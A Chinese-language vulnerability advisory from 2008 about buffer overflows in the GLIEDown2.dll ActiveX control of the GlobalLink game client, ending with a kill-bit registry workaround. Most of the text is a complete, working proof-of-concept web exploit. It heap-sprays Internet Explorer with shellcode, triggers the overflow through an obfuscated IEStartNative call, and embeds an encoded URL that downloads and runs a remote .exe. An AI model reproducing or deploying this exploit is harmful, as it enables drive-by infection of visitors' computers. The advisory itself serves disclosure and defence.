联众世界GLIEDown2.dll Active控件多个缓冲区溢出漏洞

发布日期:2008-05-07
更新日期:2008-06-03

受影响系统:
GlobalLink GlobalLink 2.8.1.2 beta
描述:
BUGTRAQ  ID: 29118,29446

联众世界是在中国非常流行的在线游戏网站。

联众世界的游戏大厅主程序GLWorld所安装的GLIEDown2.dll ActiveX控件(CLSID:F917534D-535B-416B-8E8F-0C04756C31A8)没有正确地处理对IEStart()、IEStartNative()方法以及ServerList、GameInfo和GruopName属性的输入参数。如果用户受骗访问了恶意网页并向这些方法或属性传送了特制参数的话,就可能触发堆溢出或栈溢出,导致在用户系统上执行任意指令。

利用此漏洞进行挂马的0day攻击已经出现。

<*来源:知道安全 (http://www.scanw.com/blog)
  
  链接:http://www.scanw.com/blog/archives/175
        http://secunia.com/advisories/30469/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

CLSID: F917534D-535B-416B-8E8F-0C04756C31A8  

<script>
document.writeln("<html>");
document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>");
document.writeln("<body>");
document.writeln("<SCRIPT language=\"JavaScript\">");
document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +");
document.writeln("\"%u17eb%u645e%u30a1%u0000\" +");
document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +");
document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +");
document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +");
document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +");
document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +");
document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +");
document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +");
document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +");
document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +");
document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +");
document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +");
document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +");
document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +");
document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +");
document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +");
document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +");
document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +");
document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +");
document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +");
document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +");
document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +");
document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +");
document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +");
document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +");
document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +");
document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +");
document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +");
document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +");
document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +");
document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +");
document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +");
document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +");
document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +");
document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +");
document.writeln("\"%ue820%ufdda%uffff\" +");
document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";");
document.writeln("var shellcode = unescape(cikeqq575562708);");
document.writeln("var nop = \"tmp9090tmp9090\";");
document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));");
document.writeln("while (Cike.length<224) Cike+=Cike;");
document.writeln("fillvcbcv = Cike.substring(0, 224);");
document.writeln("vcbcv = Cike.substring(0, Cike.length-224);");
document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;");
document.writeln("gdfgdh = new Array();");
document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;");
document.writeln("var hellohack = \'\';");
document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';");
document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");");
document.writeln("<\/script>");
document.writeln("<\/body>");
document.writeln("<\/html>");
document.writeln("")
</script>

建议:
临时解决方法:

* 为有漏洞的控件设置Kill-Bit(将该CLSID的Compatibility Flags设为0x400后,IE将拒绝实例化该控件,从而阻断通过网页触发漏洞的途径):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F917534D-535B-416B-8E8F-0C04756C31A8}]
"Compatibility Flags"=dword:00000400

厂商补丁:

GlobalLink
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ourgame.com/
